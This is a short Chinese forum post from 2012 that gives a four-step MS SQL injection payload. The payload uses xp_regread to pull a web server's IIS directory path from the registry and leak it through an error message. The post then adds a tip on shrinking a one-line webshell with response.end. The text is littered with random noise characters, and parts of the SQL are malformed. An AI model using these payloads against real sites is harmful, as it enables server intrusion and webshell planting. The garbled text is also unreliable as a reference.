1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
: e% O+ u. I7 ?
+ t9 D9 A% q1 K0 B7 d5 C2 F3 x& }
2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中 _( U; E* S3 H" {5 g2 `6 a* L
, ]) ~( E- X N6 b3 e
/ N& p2 K+ V8 l. J! v; j 3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段+ B( T( _/ s" z5 l
. l/ k! w' e- }* @1 q' v
& f5 N' K! G) z0 S 4、drop table [jm_tmp]-- 删除此表。
* m5 a- g% O6 t X0 _8 \+ _0 j( v9 k4 s! U' }* w+ E+ `9 E: L
B2 Y8 N7 W$ | U+ T9 l! v" i
另附上备分专用一句话
7 D$ c4 V2 y* ? 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
6 X: T. ^* p6 O! P$ X |
发表于 2012-9-15 14:23:52
收藏
支持
反对